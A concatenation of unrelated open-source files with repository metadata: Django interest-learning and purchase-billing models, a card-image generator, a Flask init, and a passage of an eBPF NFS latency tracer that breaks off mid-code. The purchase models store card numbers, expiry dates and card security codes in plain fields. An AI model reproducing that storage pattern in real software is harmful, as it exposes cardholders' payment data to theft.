            info = TopicInfo(TopicInfo.FORMAT_JSON)
            # create Topic...
            topic = Topic(cmd.path, cmd.name, cmd.description, True, info, True, cmd.schema_id)
            manager.create(topic)
    # Report the (possibly unchanged) topic as JSON on stdout.
    print(JSONify.dumps(topic))
|
[
"bruno.beloff@southcoastscience.com"
] |
bruno.beloff@southcoastscience.com
|
8e868f3bca628272d0460d3f315e9aef35c58a5e
|
3b316099f27fc3607a7da5189bb7e5d1f6d265a3
|
/popclick/interest_learning.py
|
71b5a84b0b95d6390b9e0a56ec0b6765252e8a4c
|
[] |
no_license
|
phileasme/Mixed-Collaborative-Filtering_PopClick_server
|
91d14fea6601f114e04a52b461f050cd09fc4675
|
0721c78cf1f41cf2a84b2523e4e6d585ecf8ef62
|
refs/heads/master
| 2021-03-19T18:58:58.805233
| 2017-04-18T09:41:19
| 2017-04-18T09:41:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,243
|
py
|
"""
* ©Copyrights, all rights reserved at the exception of the mentioned 3rd party libraries.
* @author: Phileas Hocquard
* Profile Learning, Interests formatting
* Location : /mainsite/popclick/interest_learning.py
"""
# Database models
from .models import Interest, PageobjectInterest, Visit, Website, SecureAuth, Page, Profile, ProfileInterest, PageObject, ProfilePageobject, PageobjectLog
# Operations / Third party
import numpy as np
from numpy import exp, array, random, dot
# External file import
from popclick.neural_network_interests import *
def get_formatted_user_or_pageobject_interests(profile_or_pageobject, query_profiles_interests=None):
    """
    Build a dense interest-level vector for a Profile or a PageObject.

    The vector is indexed by Interest name in alphabetical order; positions
    with no stored level remain 0.

    Args:
        (Profile/Pageobject) profile_or_pageobject
        (QuerySet) query_profiles_interests: optional pre-selected
            ProfileInterest manager/queryset; defaults to
            ProfileInterest.objects when the first argument is a Profile.
    """
    # Get all names — their alphabetical order defines each interest's index.
    interests = [i.name for i in Interest.objects.all().order_by('name')]
    # Make an array of zeros
    standardized_profile_or_pageobject_interests = [0]*(len(interests))
    # If no queryset was supplied and the argument is a Profile, use the default manager
    if query_profiles_interests == None:
        if profile_or_pageobject.__class__.__name__ == 'Profile':
            query_profiles_interests = ProfileInterest.objects
    # Build a list of (interest_name, level) tuples for this object
    if query_profiles_interests != None:
        pr_int_lvl_index = [(pi['interest'],pi['level']) for pi in query_profiles_interests.filter(profile=profile_or_pageobject).values('interest','level')]
    else:
        # Otherwise the argument is a PageObject: read its PageobjectInterest rows
        pr_int_lvl_index = [(pi['interest'],pi['level']) for pi in PageobjectInterest.objects.filter(pageobject=profile_or_pageobject).values('interest','level')]
    # Scatter each level into the slot given by the sorted interest names.
    # NOTE(review): assumes .values('interest') yields the interest *name*
    # (i.e. Interest's natural key) — confirm against the model definition.
    for it in pr_int_lvl_index:
        standardized_profile_or_pageobject_interests[interests.index(it[0])] = it[1]
    return standardized_profile_or_pageobject_interests
def learn_interests(profile, pageobject):
    """
    Main learning step for a profile, run when the last page object was
    interacted with by more than one user.

    Builds a matrix of interest vectors (one row per page object the profile
    has selected, weighted by selection count), feeds it with the profile's
    own vector to the neural net, and stores the resulting interest levels.

    Args:
        (Profile): profile
        (PageObject): pageobject
    """
    matrix_pageobjects_interests = []
    # All (profile, pageobject) association rows for this profile.
    profile_pageobjects = ProfilePageobject.objects.filter(profile=profile)
    interests = [i.name for i in Interest.objects.all().order_by('name')]
    profile_formatted = get_formatted_user_or_pageobject_interests(profile)
    # Skip learning when this object has only ever been selected once.
    if not pageobject.selections == 1:
        for profile_pageobject in profile_pageobjects:
            # The formatted interest vector for each of the user's page objects.
            formatted_po_interests = get_formatted_user_or_pageobject_interests(profile_pageobject.pageobject)
            # Only rows with at least one non-zero interest contribute.
            if not np.count_nonzero(formatted_po_interests) == 0:
                # Weight the row by how often the user selected this object.
                matrix_pageobjects_interests.append([i * profile_pageobject.selections for i in formatted_po_interests])
        # Set profile interests, calling the neural-net algorithm.
        set_profile_interests(profile, runNN(matrix_pageobjects_interests, profile_formatted), interests)
def set_profile_interests(profile, new_profile_interests, interests):
    """
    Persist freshly computed interest levels for a user.

    Existing levels are blended with the new ones using an exponential
    moving average (weight 0.96 on the old value); brand-new interests take
    only the (1 - 0.96) share of the new value.

    Args:
        (Profile): profile
        (list) new_profile_interests: levels aligned with *interests*
        (list) interests: interest names, in the same order used to build
            the vectors (alphabetical)
    """
    # Learning rate: how much of the previous level is kept.
    default_learning_curve= 0.96
    # For each interest, at its position in the shared ordering
    for index, interest_name in enumerate(interests):
        interest = Interest.objects.get(name=interest_name)
        # Create or fetch this user's row for the interest
        profile_interest, created = ProfileInterest.objects.get_or_create(profile=profile, interest=interest)
        # Blend old and new levels (new rows have no history to blend with)
        if created:
            profile_interest.level = (1-default_learning_curve)*new_profile_interests[index]
        else:
            profile_interest.level = default_learning_curve*profile_interest.level + (1-default_learning_curve)*new_profile_interests[index]
        profile_interest.save()
|
[
"phileas.hocquard@gmail.com"
] |
phileas.hocquard@gmail.com
|
da3150e3ef764f498ec892ffff76105a2e017563
|
b0a2d11b3133aa1370c2b5f94437c96942772533
|
/purchaseapp/models.py
|
efd15a730af09855f267b6b9dc2ef37b4f9d3b4a
|
[] |
no_license
|
NeethuDavis1990/Purcahse-Bill-Django
|
f65b0d6e688a2b3adf677b2fbb49ade8ebbc6f02
|
67322e69ce484a487bdef9e84dcb5217b6229b71
|
refs/heads/master
| 2023-08-06T16:28:04.575626
| 2021-10-13T12:33:25
| 2021-10-13T12:33:25
| 416,735,523
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,043
|
py
|
from django.db import models
from django.db.models import deletion
from django.db.models.base import Model
from django.db.models.fields import DecimalField, NullBooleanField
from django.db.models.fields.related import OneToOneField
from django.db.models.lookups import Transform
# Create your models here.
class State(models.Model):
    """State master record: name, numeric code and abbreviation."""
    StateId=models.IntegerField(auto_created=True,primary_key=True)
    # NOTE(review): StateName is nullable, so __str__ can return None and
    # raise a TypeError when rendered — confirm whether blank states exist.
    StateName=models.CharField(max_length=50,verbose_name="State",null=True,blank=True)
    StateCode=models.IntegerField(verbose_name="State Code",null=True,blank=True,)
    StateAbbr=models.CharField(max_length=5,verbose_name="State Abbr",null=True,blank=True)
    def __str__(self):
        return self.StateName
class City(models.Model):
    """City master record, linked to its State."""
    CityId=models.IntegerField(auto_created=True,primary_key=True)
    # NOTE(review): nullable CityName means __str__ may return None.
    CityName=models.CharField(max_length=50,verbose_name="City",null=True,blank=True)
    State=models.ForeignKey(State,on_delete=models.CASCADE,null=True,blank=True)
    def __str__(self):
        return self.CityName
class Party(models.Model):
    """A supplier ("party"): identity, GST number, location and status."""
    PartyId=models.IntegerField(auto_created=True,primary_key=True)
    PartyName=models.CharField(max_length=100,verbose_name="Supplier")
    GSTNNo=models.CharField(max_length=17,verbose_name="GSTN No",null=True,blank=True)
    State=models.ForeignKey(State,on_delete=models.CASCADE,null=True,blank=True)
    City=models.ForeignKey(City,on_delete=models.PROTECT,null=True,blank=True)
    Shop=models.CharField(max_length=100,verbose_name="Shop Address",null=True,blank=True)
    PartyType=models.CharField(max_length=10,verbose_name="Supplier Type",null=True,blank=True)
    # 1 = active, other values presumably inactive — confirm callers' convention.
    IsActive=models.IntegerField(verbose_name="Is Active",default=1)
    def __str__(self):
        return self.PartyName
class Category(models.Model):
    """Product category with its HSN code and tax percentage."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    # NOTE(review): nullable CategoryName means __str__ may return None.
    CategoryName=models.CharField(max_length=50,verbose_name="Category",null=True,blank=True)
    HSNCode=models.CharField(max_length=10,verbose_name="HSN Code",null=True,blank=True)
    TaxPercentage=models.DecimalField(verbose_name="Tax Percentage",max_digits=10,decimal_places=3,null=True,blank=True)
    def __str__(self):
        return self.CategoryName
class UOM(models.Model):
    """Unit of measure (e.g. type name plus short code)."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    Uomtype=models.CharField(max_length=25,verbose_name="UOM")
    UomCode=models.CharField(max_length=10,verbose_name="UOM Code",null=True,blank=True)
    def __str__(self):
        return self.Uomtype
class Product(models.Model):
    """An item that can be purchased: code, price, base unit and category."""
    ProductId=models.IntegerField(auto_created=True,primary_key=True)
    # NOTE(review): nullable ProductName means __str__ may return None.
    ProductName=models.CharField(max_length=100,verbose_name="Item",null=True,blank=True)
    ProductCode=models.CharField(max_length=15,verbose_name="Item Code",null=True,blank=True)
    ProductPrice=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    BaseUOM=models.ForeignKey(UOM,on_delete=models.CASCADE,null=True,blank=True,verbose_name="Base UOM")
    ReorderLevel=models.IntegerField(verbose_name="Reorder Level",null=True,blank=True)
    Category=models.ForeignKey(Category,on_delete=models.CASCADE,null=True,blank=True)
    def __str__(self):
        return self.ProductName
class Paymentmode(models.Model):
    """A payment mode label (cash, card, ...)."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    # NOTE(review): nullable PaymentMode means __str__ may return None.
    PaymentMode=models.CharField(max_length=25,verbose_name="Payment mode",null=True,blank=True)
    def __str__(self):
        return self.PaymentMode
class PaymentDetails(models.Model):
    """Payment instrument details captured for a purchase (payee, card data)."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    PaymentMode=models.ForeignKey(Paymentmode,on_delete=models.CASCADE,verbose_name="Pay Mode",null=True,blank=True)
    PayeeName=models.CharField(max_length=50,verbose_name="Name of Payee",null=True,blank=True)
    CardNo=models.CharField(max_length=25,verbose_name="Card Number",null=True,blank=True)
    ExpDate=models.DateField(verbose_name="Expiry Date",null=True,blank=True)
    # NOTE(review): verbose_name has a typo ("Secuirity") — fixing it changes a
    # user-facing label and triggers a migration, so it is left as-is here.
    Code=models.CharField(max_length=3,verbose_name="Secuirity code",null=True,blank=True)
    def __str__(self):
        # Fix: PaymentMode is a ForeignKey (a Paymentmode instance or None);
        # __str__ must return a str, so convert instead of returning the
        # related model instance (which raises TypeError when rendered).
        return str(self.PaymentMode)
class PurchaseMaster(models.Model):
    """Header record of a purchase invoice: supplier, totals and tax summary.

    Line items live in PurchaseDetails (the through model of ``Item``).
    """
    Id=models.IntegerField(auto_created=True,primary_key=True)
    InvoiceNo=models.CharField(max_length=25,verbose_name="Invoice No")
    State=models.ForeignKey(State,on_delete=models.CASCADE,verbose_name="Purchase State",null=True,blank=True)
    Supplier=models.ForeignKey(Party,on_delete=models.CASCADE,null=True,blank=True)
    Remarks=models.CharField(max_length=550,null=True,blank=True)
    InvoiceDate=models.DateField(verbose_name="Invoice Date",null=True,blank=True)
    Type=models.CharField(max_length=25,verbose_name="Purchase Type",null=True,blank=True)
    # Many-to-many to Product through PurchaseDetails (one row per line item).
    Item=models.ManyToManyField(Product,through="PurchaseDetails",related_name="PurchaseMaster")
    TaxableAmt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Taxable Amount",null=True,blank=True)
    CGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="CGST Amount",null=True,blank=True)
    SGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="SGST Amount",null=True,blank=True)
    IGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="IGST Amount",null=True,blank=True)
    Subtotal=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Purchase Subtotal",null=True,blank=True)
    Discount=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Purchase Discount",null=True,blank=True)
    GrantTotal=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Purchase GrantTotal",null=True,blank=True)
    Paymode=models.ForeignKey(Paymentmode,on_delete=models.CASCADE,null=True,blank=True)
    def __str__(self):
        return self.InvoiceNo
class PurchaseDetails(models.Model):
    """One line item of a purchase invoice: product, quantity, rate and taxes."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    InvoiceNo=models.ForeignKey(PurchaseMaster,on_delete=models.CASCADE,null=True,blank=True)
    Item=models.ForeignKey(Product,on_delete=models.CASCADE,null=True,blank=True)
    HSNCode=models.CharField(max_length=20,blank=True,null=True,verbose_name="HSN Code")
    Quantity=models.IntegerField(verbose_name="Qty",null=True,blank=True)
    Rate=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    UOM=models.ForeignKey(UOM,on_delete=models.PROTECT,null=True,blank=True)
    Disc=models.CharField(max_length=10,blank=True,null=True)
    Taxable=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    Tax=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    CGST=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    SGST=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    IGST=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    BaseQty=models.IntegerField(verbose_name="Base Qty",null=True,blank=True)
    Amount=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
    def __str__(self):
        # Fix: Item is a ForeignKey (a Product instance or None); __str__ must
        # return a str, so convert instead of returning the model instance
        # (which raises TypeError when rendered).
        return str(self.Item)
class GSTwiseSummary(models.Model):
    """Per-invoice roll-up of GST/CGST/SGST amounts."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    # NOTE(review): nullable InvoiceNo means __str__ may return None.
    InvoiceNo=models.CharField(max_length=10,verbose_name="Invoice No",null=True,blank=True)
    GSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="GST Amount",null=True,blank=True)
    CGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="CGST Amount",null=True,blank=True)
    SGTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="SGST Amount",null=True,blank=True)
    def __str__(self):
        return self.InvoiceNo
class StockTable(models.Model):
    """Current stock level for a product, in its base unit of measure."""
    Id=models.IntegerField(auto_created=True,primary_key=True)
    ProductName=models.ForeignKey(Product,on_delete=models.CASCADE,null=True,blank=True)
    StockQty=models.IntegerField(verbose_name="Stock Quantity",null=True,blank=True)
    BaseUOM=models.ForeignKey(UOM,on_delete=models.PROTECT,null=True,blank=True)
    def __str__(self):
        # Fix: ProductName is a ForeignKey (a Product instance or None);
        # __str__ must return a str, so convert instead of returning the
        # model instance (which raises TypeError when rendered).
        return str(self.ProductName)
|
[
"86987322+NeethuDavis1990@users.noreply.github.com"
] |
86987322+NeethuDavis1990@users.noreply.github.com
|
f5bdd285feb53c2fc3eb0e62e11362e06e099ff9
|
f6f7898c9b327c29484ca77b53f72b4700c3bc72
|
/build.py
|
7147852683f113d3da9df985023dd59fa2559723
|
[] |
no_license
|
yourcelf/flamewar
|
eb2f08c6420dd9f9bf3472a4135a89f7e7444f58
|
8b03b65876851da9170c37242fce8588221819b1
|
refs/heads/master
| 2021-01-11T11:00:54.789709
| 2013-04-09T16:29:31
| 2013-04-09T16:29:31
| 3,710,171
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,163
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from PIL import Image, ImageDraw, ImageFont
import yaml
BASE = os.path.dirname(__file__)
#FONT = "/usr/share/fonts/truetype/msttcorefonts/Courier_New.ttf"
#FONT = "/usr/share/fonts/truetype/msttcorefonts/Andale_Mono.ttf"
FONT = "/usr/share/fonts/truetype/ubuntu-font-family/UbuntuMono-R.ttf"
#FONT = "/usr/share/fonts/truetype/ttf-dejavu/DejaVuSansMono.ttf"
#FONT = "/usr/share/fonts/truetype/freefont/FreeSans.ttf"
#FONT = "/usr/share/fonts/truetype/ttf-liberation/LiberationMono-Regular.ttf"
class Card(object):
    """Base playing-card image: a white RGBA canvas.

    Dimensions are given in inches and multiplied by ``density`` (dots per
    inch) to obtain pixel sizes.
    """
    density = 300
    def __init__(self, width=2.5, height=3.5):
        self.im = Image.new(
            'RGBA',
            (int(width * self.density), int(height * self.density)),
            (255, 255, 255, 255),
        )
    def draw_wrapped_text(self, text, boundaries, rev_indent="", par_height=1,
                          font_size=48,
                          font_path=FONT):
        """Greedily word-wrap *text* into the inch-coordinate box *boundaries*.

        ``boundaries`` is ``((x0, y0), (x1, y1))`` in inches; only the width
        is enforced — text may overflow the bottom. ``rev_indent`` is
        prepended to the first word of every continuation line; blank
        paragraphs advance by ``par_height`` line heights.
        """
        font = ImageFont.truetype(font_path, font_size)
        x, y = [a * self.density for a in boundaries[0]]
        # NOTE: ``my`` (the bottom edge) is computed but never used — wrapping
        # only clips horizontally.
        mx, my = [a * self.density for a in boundaries[1]]
        width = mx - x
        ypos = y
        paragraphs = text.split("\n")
        draw = ImageDraw.Draw(self.im)
        for par in paragraphs:
            if not par.strip():
                # Empty paragraph: just advance the cursor.
                ypos += font.getsize("M")[1] * par_height
                continue
            words = par.split()
            i = 0
            while True:
                if len(words) == 0:
                    break
                # Try fitting one more word; flush the line when it overflows
                # or when all remaining words fit.
                fsize = font.getsize(" ".join(words[:i + 1]))
                if fsize[0] > width or i >= len(words):
                    # NOTE(review): a single word wider than the box draws one
                    # empty line before the word itself (i == 0 here) — confirm
                    # whether that spacing is intentional.
                    text = " ".join(words[:i])
                    draw.text((x, ypos), text, fill=(0, 0, 0), font=font)
                    ypos = ypos + fsize[1]
                    words = words[i:]
                    if rev_indent and len(words):
                        words[0] = rev_indent + words[0]
                    i = 0
                i += 1
    def load_background(self, filepath):
        """Paste *filepath*, resized to fill the card, as the background."""
        bg = Image.open(filepath).resize(self.im.size)
        self.im.paste(bg, (0, 0) + self.im.size)
    def save(self, filename, fmt=None):
        """Write the card image to *filename* (format inferred unless given)."""
        return self.im.save(filename, fmt)
class GoalCard(Card):
    """A goal card: type banner, goal text and a centred grid of light icons."""
    def __init__(self, goal_type, goal, lights, *args, **kwargs):
        super(GoalCard, self).__init__(*args, **kwargs)
        self.load_background(os.path.join(BASE, "images", "goal.png"))
        self.draw_wrapped_text(goal_type.upper(), ((0.32, 0.64), (2.22, 0.86)), font_size=48)
        self.draw_wrapped_text(goal, ((0.33, 0.96), (2.25, 1.95)), font_size=40)
        # Draw stars: one row of up to 4 lights, two rows beyond that.
        rows = 2 if lights > 4 else 1
        # Floor division: ``lights / rows`` only truncated on Python 2, and
        # range() rejects floats on Python 3. ``//`` keeps both working.
        per_row = lights // rows
        star = Image.open(os.path.join(BASE, "images", "light.png"))
        star_dims = (0.25, 0.25)
        box = ((0.29, 2.41), (2.25, 3.18))
        # Centre the grid horizontally within the box.
        start_x = box[0][0] + (box[1][0] - box[0][0]) / 2 - star_dims[0] * (per_row / 2.0)
        # NOTE(review): this uses box[1][0] (an x coordinate) as the y anchor;
        # box[0][1] looks like the intended value — confirm visually before changing.
        start_y = box[1][0] + (box[1][1] - box[1][0]) / 2 - star_dims[1] * (rows / 2.0)
        for r in range(rows):
            for i in range(per_row):
                dims = [int(self.density * a) for a in (
                    start_x + star_dims[0] * i,
                    start_y + star_dims[1] * r,
                    start_x + star_dims[0] * (i + 1),
                    start_y + star_dims[1] * (r + 1),
                )]
                self.im.paste(star, dims)
class BlankEmailCard(Card):
    """An email card showing the template background only (no text)."""
    def __init__(self, *args, **kwargs):
        super(BlankEmailCard, self).__init__(*args, **kwargs)
        bg_path = os.path.join(BASE, "images", "email.png")
        self.load_background(bg_path)
class EmailCard(BlankEmailCard):
    """An email card populated with flame/light scores, subject and body."""
    def __init__(self, subject, message, lights, flames, *args, **kwargs):
        super(EmailCard, self).__init__(*args, **kwargs)
        # Header score boxes first, then the subject line, then the body.
        fields = (
            (str(flames), ((1.55, 0.18), (1.86, 0.39)), 64),
            (str(lights), ((1.97, 0.18), (2.25, 0.39)), 64),
            (subject, ((0.30, 0.43), (2.16, 1.59)), 36),
            (message, ((0.27, 0.70), (2.27, 3.25)), 36),
        )
        for content, box, size in fields:
            self.draw_wrapped_text(content, box, font_size=size)
class InterruptCard(Card):
    """An interrupt card: large title above explanatory text."""
    def __init__(self, title, description, *args, **kwargs):
        super(InterruptCard, self).__init__(*args, **kwargs)
        self.load_background(os.path.join(BASE, "images", "interrupt.png"))
        for content, box, size in (
            (title, ((0.25, 0.85), (2.25, 1.35)), 64),
            (description, ((0.25, 1.35), (2.25, 3.25)), 40),
        ):
            self.draw_wrapped_text(content, box, font_size=size)
class AttentionCard(Card):
    """An attention card built in landscape and rotated back upright."""
    def __init__(self, description, *args, **kwargs):
        # Rendered at 3.5" x 2.5" (landscape), then rotated 90 degrees.
        super(AttentionCard, self).__init__(*args, width=3.5, height=2.5, **kwargs)
        bg_path = os.path.join(BASE, "images", "attention.png")
        self.load_background(bg_path)
        self.draw_wrapped_text(description, ((0.25, 0.85), (2.80, 2.25)), font_size=48)
        self.im = self.im.rotate(90)
def build():
    """Render every card defined in cards.yaml into the cards/ directory.

    Emits goal-NN.png, email-NN.png (real emails followed by 5 blanks),
    interrupt-NN.png (each interrupt twice) and attention-NN.png.
    """
    out = os.path.join(BASE, "cards")
    try:
        os.makedirs(out)
    except OSError:
        # Directory already exists (kept py2-compatible; py3 could use exist_ok=True).
        pass
    with open("cards.yaml") as fh:
        # safe_load: cards.yaml is plain data, and yaml.load without an explicit
        # Loader can construct arbitrary objects (and is a hard error in PyYAML >= 6).
        defs = yaml.safe_load(fh)
    count = 0
    for goal_type, goalinfo in defs['goals'].items():
        for card in goalinfo['cards']:
            GoalCard(
                lights=goalinfo['lights'],
                goal_type=goal_type,
                goal=card,
            ).save(
                os.path.join(out, "goal-%02d.png" % count)
            )
            count += 1
    count = 0
    for email in defs['action']['email']:
        EmailCard(**email).save(os.path.join(out, "email-%02d.png" % count))
        count += 1
    # Pad the deck with blank email cards players can fill in by hand.
    for i in range(5):
        BlankEmailCard().save(os.path.join(out, "email-%02d.png" % count))
        count += 1
    count = 0
    # Double-up on interrupt cards.
    for i in range(2):
        for interrupt in defs['action']['interrupt']:
            InterruptCard(**interrupt).save(os.path.join(out, "interrupt-%02d.png" % count))
            count += 1
    count = 0
    for attention in defs['attention']:
        AttentionCard(attention).save(os.path.join(out, "attention-%02d.png" % count))
        count += 1
if __name__ == "__main__":
    # Script entry point: regenerate the full card deck.
    build()
|
[
"cfd@media.mit.edu"
] |
cfd@media.mit.edu
|
4541dbb6e82625bb4cc57a6bb13dba1ce1c26d8b
|
7cef36e10852878a0fe525d36665f793352ae5db
|
/app/__init__.py
|
c2902175acb5cf8b080d21d472953df6c212c4ec
|
[] |
no_license
|
natusaspire/shop
|
b5e1efeaf64f39c60b324145a6d4eec88d6f49e7
|
ee266e529f6d1fd7dac82c10a78cdc7efbb04eb3
|
refs/heads/master
| 2020-03-23T03:42:44.446839
| 2018-07-15T17:23:41
| 2018-07-15T17:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 348
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_bootstrap import Bootstrap
# Application factory side: Flask app, config, database, migrations, Bootstrap.
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
migrate = Migrate(app, db)
Bootstrap(app)
# Imported after ``app``/``db`` exist — presumably because the views module
# imports from this package (circular-import avoidance); confirm before moving.
from app.shop.views import shop
app.register_blueprint(shop, url_prefix='/')
|
[
"natusaspire@gmail.com"
] |
natusaspire@gmail.com
|
c1d8da7543c92a89f99f832a1045b6f2083b754d
|
319221542ebea78162d240006851c0a9363ab5b0
|
/plugins/nfsslower.py
|
dedaf300c572519c3c4c8a757fd9c7cdafed67d7
|
[
"Apache-2.0"
] |
permissive
|
wuli133144/lmp
|
59e4f42b65bf9a4990e37adb1a7ac754b295f9e2
|
0007989c5a59bf58e462d2948fcf0779674ebef0
|
refs/heads/master
| 2023-08-29T16:09:17.487964
| 2021-10-13T16:09:27
| 2021-10-13T16:09:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,085
|
py
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# nfsslower Trace slow NFS operations
# for Linux using BCC & eBPF
#
# Usage: nfsslower [-h] [-p PID] [min_ms]
#
# This script traces some common NFS operations: read, write, opens and
# getattr. It measures the time spent in these operations, and prints details
# for each that exceeded a threshold.
#
# WARNING: This adds low-overhead instrumentation to these NFS operations,
# including reads and writes from the file system cache. Such reads and writes
# can be very frequent (depending on the workload; eg, 1M/sec), at which
# point the overhead of this tool (even if it prints no "slower" events) can
# begin to become significant.
#
# Most of this code is copied from similar tools (ext4slower, zfsslower etc)
#
# By default, a minimum millisecond threshold of 10 is used.
#
# This tool uses kprobes to instrument the kernel for entry and exit
# information, in the future a preferred way would be to use tracepoints.
# Currently there aren't any tracepoints available for nfs_read_file,
# nfs_write_file and nfs_open_file, nfs_getattr does have entry and exit
# tracepoints but we chose to use kprobes for consistency
#
# 31-Aug-2017 Samuel Nair created this. Should work with NFSv{3,4}
from __future__ import print_function
from bcc import BPF
import argparse
from time import strftime
# for influxdb
from init_db import influx_client
from const import DatabaseType
from db_modules import write2db
from datetime import datetime
# Usage examples embedded verbatim in the --help epilog.
examples = """
./nfsslower # trace operations slower than 10ms
./nfsslower 1 # trace operations slower than 1ms
./nfsslower -j 1 # ... 1 ms, parsable output (csv)
./nfsslower 0 # trace all nfs operations
./nfsslower -p 121 # trace pid 121 only
"""
parser = argparse.ArgumentParser(
    description="""Trace READ, WRITE, OPEN \
and GETATTR NFS calls slower than a threshold,\
supports NFSv{3,4}""",
    formatter_class=argparse.RawDescriptionHelpFormatter,
    epilog=examples)
parser.add_argument("-j", "--csv", action="store_true",
                    help="just print fields: comma-separated values")
parser.add_argument("-p", "--pid", help="Trace this pid only")
parser.add_argument("min_ms", nargs="?", default='10',
                    help="Minimum IO duration to trace in ms (default=10ms)")
parser.add_argument("--ebpf", action="store_true",
                    help=argparse.SUPPRESS)
args = parser.parse_args()
min_ms = int(args.min_ms)  # latency threshold in milliseconds (0 = trace all)
pid = args.pid  # optional PID filter (string or None)
csv = args.csv  # True => machine-readable CSV output
debug = 0  # set to 1 to dump the generated BPF C source before loading
# data structure from template
# data structure from template
class lmp_data(object):
    """One output row handed to write2db(); attribute names must match the
    field names listed in data_struct["fields"]."""

    def __init__(self, a, b, c, d, e, f, g, h, i, j=None):
        # `j` was required-but-unused in the original signature while the only
        # visible caller passes nine values; it now has a default so both the
        # 9-argument and 10-argument call forms work.
        self.time = a       # ISO-format timestamp string
        self.glob = b       # tag value for InfluxDB
        self.comm = c       # process command name
        self.PID = d        # process id
        self.T = e          # one-letter operation type (R/W/O/G)
        self.BYTES = f      # I/O size in bytes
        self.OFF_KB = g     # file offset in KiB
        # 'LAT(ms)' is not a valid Python identifier, so it must be stored via
        # setattr(); the original `self.LAT(ms) = h` was a SyntaxError.
        setattr(self, 'LAT(ms)', h)
        self.FILENAME = i   # file name the operation touched
# Schema passed to write2db(): 'glob' is the InfluxDB tag; each entry in
# "fields" must correspond to an attribute on the lmp_data row object.
data_struct = {"measurement":'nfsslower',
               "time":[],
               "tags":['glob',],
               "fields":['time','comm','PID','T','BYTES','OFF_KB','LAT(ms)','FILENAME']}
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <linux/dcache.h>
#define TRACE_READ 0
#define TRACE_WRITE 1
#define TRACE_OPEN 2
#define TRACE_GETATTR 3
struct val_t {
u64 ts;
u64 offset;
struct file *fp;
struct dentry *d;
};
struct data_t {
// XXX: switch some to u32's when supported
u64 ts_us;
u64 type;
u64 size;
u64 offset;
u64 delta_us;
u64 pid;
char task[TASK_COMM_LEN];
char file[DNAME_INLINE_LEN];
};
BPF_HASH(entryinfo, u64, struct val_t);
BPF_PERF_OUTPUT(events);
int trace_rw_entry(struct pt_regs *ctx, struct kiocb *iocb,
struct iov_iter *data)
{
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
if(FILTER_PID)
return 0;
// store filep and timestamp by id
struct val_t val = {};
val.ts = bpf_ktime_get_ns();
val.fp = iocb->ki_filp;
val.d = NULL;
val.offset = iocb->ki_pos;
if (val.fp)
entryinfo.update(&id, &val);
return 0;
}
int trace_file_open_entry (struct pt_regs *ctx, struct inode *inode,
struct file *filp)
{
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
if(FILTER_PID)
return 0;
// store filep and timestamp by id
struct val_t val = {};
val.ts = bpf_ktime_get_ns();
val.fp = filp;
val.d = NULL;
val.offset = 0;
if (val.fp)
entryinfo.update(&id, &val);
return 0;
}
int trace_getattr_entry(struct pt_regs *ctx, struct vfsmount *mnt,
struct dentry *dentry, struct kstat *stat)
{
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
if(FILTER_PID)
return 0;
struct val_t val = {};
val.ts = bpf_ktime_get_ns();
val.fp = NULL;
val.d = dentry;
val.offset = 0;
if (val.d)
entryinfo.update(&id, &val);
return 0;
}
static int trace_exit(struct pt_regs *ctx, int type)
{
struct val_t *valp;
u64 id = bpf_get_current_pid_tgid();
u32 pid = id >> 32; // PID is higher part
valp = entryinfo.lookup(&id);
if (valp == 0) {
// missed tracing issue or filtered
return 0;
}
// calculate delta
u64 ts = bpf_ktime_get_ns();
u64 delta_us = (ts - valp->ts) / 1000;
entryinfo.delete(&id);
if (FILTER_US)
return 0;
// populate output struct
u32 size = PT_REGS_RC(ctx);
struct data_t data = {.type = type, .size = size, .delta_us = delta_us,
.pid = pid};
data.ts_us = ts / 1000;
data.offset = valp->offset;
bpf_get_current_comm(&data.task, sizeof(data.task));
// workaround (rewriter should handle file to d_name in one step):
struct dentry *de = NULL;
struct qstr qs = {};
if(type == TRACE_GETATTR)
{
bpf_probe_read_kernel(&de,sizeof(de), &valp->d);
}
else
{
bpf_probe_read_kernel(&de, sizeof(de), &valp->fp->f_path.dentry);
}
bpf_probe_read_kernel(&qs, sizeof(qs), (void *)&de->d_name);
